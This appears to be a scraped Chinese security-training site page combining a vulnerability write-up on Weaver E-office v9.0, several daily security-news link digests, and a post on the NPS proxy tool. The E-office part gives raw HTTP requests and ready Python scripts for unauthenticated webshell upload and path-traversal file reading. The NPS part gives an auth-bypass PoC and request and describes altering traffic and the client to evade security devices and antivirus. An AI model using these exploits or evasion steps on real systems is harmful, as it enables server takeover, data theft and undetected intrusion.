E-office Server_v9.0 漏洞分析
漏洞简介
泛微e-office是一款标准化的协同OA办公软件,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。由于泛微 E-Office 未能正确处理上传模块中输入的数据,未授权的攻击者可以构造恶意数据包发送给服务器,实现任意文件上传,并且获得服务器的webshell,成功利用该漏洞可以获取服务器控制权。未授权的攻击者可以构造恶意的数据包,读取服务器上的任意文件
漏洞影响范围 E-office Server_v9.0
默认安装位置是 d:\eoffice 在虚拟机内安装没有 D 盘,所以安装位置是 c:\eoffice
安装完成后,服务默认在 8082 端口 通过主机名 或 ip 地址都可以访问到
代码位置在 C:\eoffice\webroot 同样代码也是被加密了的
通过免费的解密网站获得了加密的具体信息 ZEND加密PHP5.2版本 http://www.phpjm.cc/
利用工具进行批量的解密,因为工具点击一次只能进行一次解密,所以利用模拟点击的工具进行模拟点击 https://github.com/taojy123/KeymouseGo
任意文件上传漏洞
漏洞利用
/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 10.0.21.14:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryykJoMlQs3JMOsgi3
Content-Length: 175
------WebKitFormBoundaryykJoMlQs3JMOsgi3
Content-Disposition: form-data; name="Filedata"; filename="1.php"
<?php phpinfo();?>
------WebKitFormBoundaryykJoMlQs3JMOsgi3--
上传文件的地址 http://10.0.21.14:8082/images/logo/logo-eoffice.php
漏洞分析
漏洞的主要位于 general/index/UploadFile.php
通过 $_GET 方法获取的参数 m,调用 UploadFile 中的任意方法
我们选择其中的 uploadPicture 方法
没有对传入的文件进行过滤,如果传入一个 php 文件,命名为 1.php 最后上传文件会变为 logo-eoffice.php 传入的位置是$_SERVER['DOCUMENT_ROOT']."/images/logo/"
利用脚本
import sys
import requests
def request_shell(url):
targeturl = url + "/images/logo/logo-eoffice.php"
response = requests.get(targeturl)
if(response.status_code == 200):
print("获取 shell 成功,shell地址为:"+targeturl)
def request_upload(url,data):
targeturl = url + "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="
targetfile = {'Filedata':('upload.php',data,'text/plain')}
response = requests.post(url = targeturl, files = targetfile)
if(response.status_code == 200):
print("上传成功")
def read_uploadfile(url,filename):
with open(filename) as f:
data = f.read()
request_upload(url,data)
def upload_file(url,filename):
if (filename == "phpinfo.php"):
data = "<?php phpinfo(); ?>"
request_upload(url,data)
else:
read_uploadfile(url,filename)
def main():
if len(sys.argv) < 3:
print("Usage: upload_file.py targeturl filename\n"
"Example: python upload_file.py http://10.0.21.14:8082 phpinfo.php")
exit()
url = sys.argv[1]
filename = sys.argv[2]
upload_file(url,filename)
request_shell(url)
if __name__ == '__main__':
main()
任意文件下载漏洞
漏洞利用
GET /inc/attach.php?path=/../../../../../1.txt HTTP/1.1
Host: 10.0.21.14:8082
Origin: http://10.0.21.14:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
漏洞分析
inc/attach.php
直接传入参数 $path 最后会读取 $path 的内容并将结果返回出来,我们注意到利用未授权就可将文件下载下来,从代码层面并没有看出来原因,但是通过浏览器直接访问时无法访问到,进行了 302 跳转,通过 burpsuite 就可以访问到,攥写脚本禁止 302 跳转也可以读取出来。
漏洞的主要来源位于
我们看一下文件的下载链接
利用脚本
import sys
import requests
import re
def save_reponse(re_result,filename):
filename=re.findall("[^/]+quot;,filename)[0]
# print(filename)
with open(filename, 'w',encoding='gb18030') as f:
f.write(re_result)
def re_response(response):
re_result = response[1507:]
return re_result
def read_file(url,filename):
targeturl = url + "/inc/attach.php?path="+filename
response = requests.get(url = targeturl, allow_redirects=False)
# print(response.text)
re_result = re_response(response.text)
print(re_result)
save_reponse(re_result,filename)
def main():
if len(sys.argv) < 3:
print("Usage: upload_file.py targeturl filename\n"
"Example: python read_file.py http://10.0.21.14:8082 attach.php")
exit()
url = sys.argv[1]
filename = sys.argv[2]
read_file(url,filename)
if __name__ == '__main__':
main()
还有一些 SQL 注入漏洞,还可以继续进一步的进行审计分析。
网络安全日报 2022年09月28日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、美国国防公司 Elbit Systems 披露数据泄露
https://securityaffairs.co/wordpress/136310/cyber-crime/elbit-systems-of-america-data-breach.html 2、WhatsApp 修复了两个严重远程代码执行漏洞
https://securityaffairs.co/wordpress/136300/hacking/whatsapp-critical-vulnerabilities.html 3、Erbium 信息窃取器通过破解软件和游戏外挂进行传播
https://securityaffairs.co/wordpress/136285/malware/erbium-info-stealing-malware.html 4、安全研究人员利用众包模式追踪神秘的 Metador APT
https://www.securityweek.com/researchers-crowdsourcing-effort-identify-mysterious-metador-apt 5、黑客利用PowerPoint文件中的鼠标移动触发恶意脚本
https://www.bleepingcomputer.com/news/security/hackers-use-powerpoint-files-for-mouseover-malware-delivery/ 6、Mozilla修复Firefox、Firefox ESR和Thunderbird中的高危漏洞
https://www.malwarebytes.com/blog/news/2022/09/update-firefox-and-thunderbird-now-mozilla-patches-several-high-risk-vulnerabilities 7、因儿童隐私数据保护问题,TikTok面临英国2700万英镑罚款
https://www.cnbeta.com/articles/tech/1320875.htm 8、美国警告借猴痘之名对公共卫生组织发起的网络钓鱼攻击
https://www.inforisktoday.com/hhs-hc3-warns-health-sector-monkeypox-phishing-schemes-a-20140 9、勒索团伙采取新策略,利用Exmatter工具损坏数据
https://securityaffairs.co/wordpress/136226/cyber-crime/exmatter-tool-shift-extortion-tactics.html 10、新的 NullMixer 恶意软件活动窃取用户的支付数据和凭证
https://thehackernews.com/2022/09/new-nullmixer-malware-campaign-stealing.html
网络安全日报 2022年09月27日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Lazarus组织使用BYOVD技术发起新的攻击活动
https://asec.ahnlab.com/en/38993/ 2、研究人员在谷歌Play商店发现伪装成应用程序的Harley木马
https://www.cysecurity.news/2022/09/harley-trojan-affecting-users-by.html 3、Netlify中的漏洞可能导致XSS、SSRF攻击
https://portswigger.net/daily-swig/netlify-vulnerable-to-xss-ssrf-attacks-via-cache-poisoning 4、加密货币交易所使用的npm包遭到泄露
https://www.bleepingcomputer.com/news/security/npm-packages-used-by-crypto-exchanges-compromised/ 5、Windows 11 Insider默认启用SMB身份验证速率限制器
https://www.bleepingcomputer.com/news/microsoft/windows-11-gets-better-protection-against-smb-brute-force-attacks/ 6、公安部网安局即日起开展“断号”行动,重拳打击整治网络账号黑产
https://www.ithome.com/0/642/722.htm 7、Meta被指控违法秘密跟踪iPhone用户
https://www.theregister.com/2022/09/23/meta_app_tracking/ 8、欧盟启动开放Web搜索项目,希望替代Google
https://www.secrss.com/articles/47327 9、研究人员发现新的针对IoT设备的恶意挖矿软件
https://www.cnbeta.com/articles/tech/1320439.htm 10、TargetCompany 勒索软件攻击针对微软 SQL 服务器
https://www.bleepingcomputer.com/news/security/microsoft-sql-servers-hacked-in-targetcompany-ransomware-attacks/
网络安全日报 2022年09月26日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、攻击者冒充 CircleCI 平台窃取GitHub 帐户
https://securityaffairs.co/wordpress/136211/hacking/phishing-circleci-github-accounts.html2、ISC 修复了 BIND DNS 软件中的六个高危漏洞
https://securityaffairs.co/wordpress/136164/security/bind-dns-software-flaws-2.html3、Sophos 警告防火墙产品中一个新的漏洞被黑客利用
https://securityaffairs.co/wordpress/136135/security/sophos-user-portal-webadmin-bug.html4、伦敦警方逮捕了涉嫌入侵Uber和Rockstar Games 的17岁少年
https://securityaffairs.co/wordpress/136146/cyber-crime/uber-rockstar-games-hacker-arrest.html5、匿名者(anonymous)声称入侵了俄罗斯国防部的网站
https://securityaffairs.co/wordpress/136127/hacktivism/anonymous-russian-ministry-of-defense.html6、InsydeH2O UEFI 固件中的高危漏洞影响数百万设备
https://www.securityweek.com/new-firmware-vulnerabilities-affecting-millions-devices-allow-persistent-access7、BlackCat勒索软件对其使用的数据泄露工具进行了更新
https://www.bleepingcomputer.com/news/security/blackcat-ransomware-s-data-exfiltration-tool-gets-an-upgrade/8、葡萄牙航空公司遭受勒索攻击后拒绝与黑客谈判
https://www.govinfosecurity.com/portuguese-airliner-vows-defiance-against-extortion-hackers-a-201349、Windows 11推出名为增强网络钓鱼防护的新功能
https://www.bleepingcomputer.com/news/microsoft/windows-11-now-warns-when-typing-your-password-in-notepad-websites/10、攻击者利用Magento漏洞发起新一轮攻击
https://www.bleepingcomputer.com/news/security/critical-magento-vulnerability-targeted-in-new-surge-of-attacks/
网络安全日报 2022年09月23日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Oracle 云基础设施漏洞暴露敏感数据
https://www.securityweek.com/oracle-cloud-infrastructure-vulnerability-exposed-sensitive-data 2、存在15年之久的Python "tarfile"模块漏洞影响超35万个项目
https://www.securityweek.com/15-year-old-python-vulnerability-present-350000-projects-resurrected 3、Confluence 漏洞 CVE-2022-26134 被恶意挖矿活动利用
https://securityaffairs.co/wordpress/136071/malware/atlassian-confluence-flaw-cryptomining.html 4、Lockbit 3.0勒索软件最新生成器在线泄漏
https://securityaffairs.co/wordpress/136056/data-breach/lockbit-3-0-builder-leak.html 5、Windows 11 22H2 将内核漏洞利用保护添加到安全基线
https://www.bleepingcomputer.com/news/microsoft/windows-11-22h2-adds-kernel-exploit-protection-to-security-baseline/ 6、Cobalt Strike 发布安全更新修复了XSS漏洞
https://www.techtarget.com/searchsecurity/news/252525204/Cobalt-Strike-gets-emergency-patch 7、澳大利亚电信公司Optus遭大规模网络攻击导致客户个人数据被盗
https://www.securityweek.com/australian-telecoms-firm-optus-discloses-breach-impacting-customer-data 8、过去一年中大约五分之二美国消费者的个人信息被盗、泄露或滥用
https://www.freebuf.com/news/345281.html 9、万代最新回应7月黑客入侵进展,不排除模玩部数据流失可能
https://hot.cnbeta.com/articles/game/1318869.htm 10、一黑客兜售印尼13亿手机卡用户数据,公开嘲讽多名高官
https://www.secrss.com/articles/47128
网络安全日报 2022年09月22日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、摩根士丹利因泄露数百万客户信息被罚款 3500 万美元
https://www.securityweek.com/morgan-stanley-pay-35m-fine-exposing-information-millions-customers 2、Dataprobe的iBoot 配电单元 (PDU) 中发现严重漏洞可被远程关闭设备
https://www.securityweek.com/iboot-power-distribution-unit-flaws-allow-hackers-remotely-shut-down-devices 3、超过 39,000 个未授权访问的 Redis 实例暴露在互联网上
https://thehackernews.com/2022/09/over-39000-unauthenticated-redis.html 4、美国FCC 将中国联通 (美洲) 运营有限公司列入国家安全威胁名单
https://thehackernews.com/2022/09/us-adds-2-more-chinese-telecom-firms-to.html 5、新的 BiTB 网络钓鱼攻击窃取 Steam 帐户
https://cyware.com/news/new-bitb-phishing-attacks-steal-steam-accounts-500d83f7 6、Hive勒索软件团伙攻击了纽约赛车协会
https://www.bleepingcomputer.com/news/security/hive-ransomware-claims-attack-on-new-york-racing-association/ 7、黑客入侵2K Games公司并向玩家推送恶意软件
https://www.bleepingcomputer.com/news/security/2k-games-says-hacked-help-desk-targeted-players-with-malware/ 8、黑客论坛出售Ask.fm和ask.com的3.5亿条用户数据
https://www.databreaches.net/ask-fm-user-database-with-350m-user-records-has-shown-up-for-sale/ 9、信阳师范学院曝"学信网信息泄露",原因是参加问卷调查填写了学信码
https://www.freebuf.com/news/345201.html 10、针对企事业单位和高校的StrivePhish钓鱼组织大爆发,至少千人已中招
https://x.threatbook.com/v5/article?threatInfoID=36821
网络安全日报 2022年09月21日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、纽约救护车服务Empress EMS遭勒索软件攻击超32W个人信息遭破坏
https://www.securityweek.com/new-york-emergency-services-provider-says-patient-data-stolen-ransomware-attack 2、Sandworm APT 冒充乌克兰电信公司传播恶意软件
https://securityaffairs.co/wordpress/135996/apt/sandworm-targets-ukraine-teleco.html 3、Uber称 LAPSUS$ 团伙是最近攻击Uber的幕后黑手
https://securityaffairs.co/wordpress/135980/cyber-crime/uber-hacked-by-lapsus-group.html 4、美国航空披露数据泄露事件,客户个人数据遭泄露
https://www.securityweek.com/american-airlines-says-personal-data-exposed-after-email-phishing-attack 5、加密货币做市商Wintermute遭DeFi黑客攻击,损失1.6亿美元
https://techcrunch.com/2022/09/20/crypto-market-maker-wintermute-loses-160-million-in-defi-hack 6、研究人员警告近期传播Chromeloader的攻击活动
https://securityaffairs.co/wordpress/135949/malware/chromeloader-malware-campaigns.html 7、美驻华使领馆过度采集中方雇员信息,数据或供给美国情报部门
https://baijiahao.baidu.com/s?id=1744324065971273526 8、调查:三分之一的企业未加密云端敏感数据
https://www.secrss.com/articles/47024 9、Emotet 僵尸网络正传播 Quantum 和 BlackCat 勒索软件
https://www.bleepingcomputer.com/news/security/emotet-botnet-now-pushes-quantum-and-blackcat-ransomware/ 10、Edge、Chrome的拼写检查功能会将用户输入信息上传他们的服务器
https://www.cnbeta.com/articles/tech/1317905.htm
网络安全日报 2022年09月20日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、游戏发行商 Rockstar Games 确认遭受网络攻击,GTA6源码被盗
https://www.securityweek.com/rockstar-games-confirms-breach-leading-gta-6-leak 2、金融科技公司 Revolut遭高度针对性网络攻击,超5W客户数据泄露
https://securityaffairs.co/wordpress/135935/data-breach/revolut-data-breach.html 3、为飞机提供WiFi的Flexlan设备存在严重漏洞可用于发起恶意攻击
https://securityaffairs.co/wordpress/135898/security/flexlan-critical-flaws.html 4、优步确认黑客访问了其内部工具
https://www.securityweek.com/uber-confirms-hacker-accessed-bug-bounty-dashboard-internal-tools 5、微软警告针对游戏玩家的大规模点击欺诈活动
https://thehackernews.com/2022/09/microsoft-warns-of-large-scale-click.html 6、Lockbit勒索软件团伙支付5万美元的"漏洞赏金"
https://www.govinfosecurity.com/ransomware-as-a-service-gang-lockbit-pays-first-50k-bounty-a-20099 7、安全研究员曝光特斯拉使用"特殊代码"作弊在碰撞测试中获得好成绩
https://www.freebuf.com/news/344842.html 8、美国司法部成立专门机构打击加密货币犯罪
https://www.solidot.org/story?sid=72792 9、星巴克新加坡公司遭数据泄露,22万名顾客数据被出售
https://www.freebuf.com/news/344836.html 10、洲际酒店(IHG)遭遇黑客破坏性攻击,目的竟是“为了好玩”
https://www.cnbeta.com/articles/tech/1317511.htm
NPS之Socks流量分析以及未授权复现
前言
因为想要写一个socks的流量算法去绕过安全设备,所以这里对nps的流量特征总结一下,方便自己后期的魔改。
环境
ubuntu 16.04 vps server
windows server 2012R2 clinet
mkdir nps
cd nps
wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz
tar -zxvf linux_amd64_server.tar.gz
./nps install
cd /etc/nps/conf/
vim nps.conf
配置文件
#web
web_host=a.o.com
web_username=xxxx //管理端用户名
web_password=xxxxxx //管理端密码
web_port = xxxxx //管理端端口
web_ip=0.0.0.0
web_base_url=
web_open_ssl=false
web_cert_file=conf/server.pem
web_key_file=conf/server.key
#web_base_url=/nps
##bridge
bridge_type=tcp //客户端连接协议tcp
bridge_port=xxxx //客户端连接端口
bridge_ip=0.0.0.0
bridge_port的默认端口默认为8024,这里不建议改为默认的,连接客户端的时候可能会触发安全设备规则
NPS未授权复现
POC
#encoding=utf-8
import time
import hashlib
now = time.time()
m = hashlib.md5()
m.update(str(int(now)).encode("utf8"))
auth_key = m.hexdigest()
print("Index/Index?auth_key=%s×tamp=%s" % (auth_key,int(now))
直接访问
http://vps:port?payload
exp请求接口
POST /client/list HTTP/1.1
Host: vps:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 98
Origin: http://vps:port
Connection: close
Referer: http://vps:port/client/list
search=&order=asc&offset=0&limit=10&auth_key=805df7d1f7bf3b662939ca091174e6b4×tamp=1659948547
参考链接:
https://mp.weixin.qq.com/s/PTq01wcV4XJwutbSjHjfvA修复措施
vim /etc/nps/conf/nps.conf取消注释auth_key,添加auth_crypt_key`注释
auth_key=test#auth_crypt_key =!QAZ4rfv%TGB^YHN
修改为
auth_key=test#auth_crypt_key =!QAZ4rfv%TGB^YHN
目前最新版本的也存在改配置不当问题,这里需要修改配置,修复之后是无法通过未授权读取内容信息的。
socks流量分析
nps start
访问http://vps:port/login
新增客户端
这里用户名和密码随意,这里是客户端登录的认证用户名,在客户端连接的时候是根据密钥来实现的。
客户端选择windwos server 2012R2
修改客户端配置文件
[common]
server_addr=vps:port
conn_type=tcp
vkey=xxxx
auto_reconnection=true
max_conn=1000
flow_limit=1000
rate_limit=1000
basic_username=11
basic_password=3
web_username=xxxx
web_password=xxxxx
crypt=true
compress=true
#pprof_addr=0.0.0.0:9999
disconnect_timeout=60
客户端启动
npc.exe -server=vps:port -vkey=xxxxx -type=tcp
正常情况下会报毒,所以这里针对杀软这一块儿,客户端需要做一下免杀处理。
查看连接状态
使用goby测试socks5
测试代理
已成功实现内网穿透。
这里使用wireshark抓取流量包,
初始流量服务器向客户端发送TST
同时客户端向服务端确认版本,同时返回客户端版本0.26.0
代码位置nps/lib/version/version.go
服务端接收到请求后,客户端请求的数据内容为nps的版本为0.26.10
服务端接收到请求后返回给客户端服务端版本的md5值,即
md5(0.26.0)=89a4f3fc3c89257d6f712de6964bda8e
可以发现在产生nps客户端连接的时候,会产生数据校验,这里数据校验就是有服务器到
这是客户端传输给服务端密钥连接
md5(vkey)
服务端在接收到客户端的请求后校验数据后返回success
这里客户端和服务端的连接流量就比较清晰了,那么想要bypass安全设备的告警,在修改加密方式和修改版本关键字即可,因为在做流量隐藏的时候跟bypassav不一样,不会考虑文件的哈希以及文件在沙箱中的落地状态。
网络安全日报 2022年09月19日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、FunJSQ 游戏加速模块漏洞影响多个Netgear 路由器
https://securityaffairs.co/wordpress/135887/security/netgear-game-acceleration-module-flaw.html 2、Bitdefender 发布LockerGoga 勒索软件解密器
https://securityaffairs.co/wordpress/135843/malware/lockergoga-ransomware-decryptor.html 3、UNC4034 APT 通过 WhatsApp 传播带后门的 PuTTY
https://securityaffairs.co/wordpress/135831/malware/north-korea-linked-apt-backdoored-putty.html 4、Uber被黑,内部系统和机密文件据称遭到破坏
https://securityaffairs.co/wordpress/135811/data-breach/uber-hacked-systems-allegedly-compromised.html 5、信安标委发布《信息安全技术 网络数据分类分级要求》(征求意见稿)
https://www.freebuf.com/news/344672.html 6、CISA 命令机构修补 Stuxnet 攻击中使用的漏洞
https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-vulnerability-used-in-stuxnet-attacks/ 7、美国参议员透露海关如何从美国人的设备中收集数据
https://www.zdnet.com/article/us-senator-reveals-how-us-customs-has-amassed-data-from-americans-devices/ 8、LastPass对8月遭网络攻击事件调查后未发现客户数据泄露
https://www.bleepingcomputer.com/news/security/lastpass-says-hackers-had-internal-access-for-four-days/ 9、研究人员发现利用Microsoft Edge新闻源的恶意广告活动
https://www.bleepingcomputer.com/news/security/microsoft-edge-s-news-feed-ads-abused-for-tech-support-scams/ 10、攻击者利用Emotet僵尸网络传播Quantum和BlackCat勒索软件
https://www.bleepingcomputer.com/news/security/emotet-botnet-now-pushes-quantum-and-blackcat-ransomware/
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

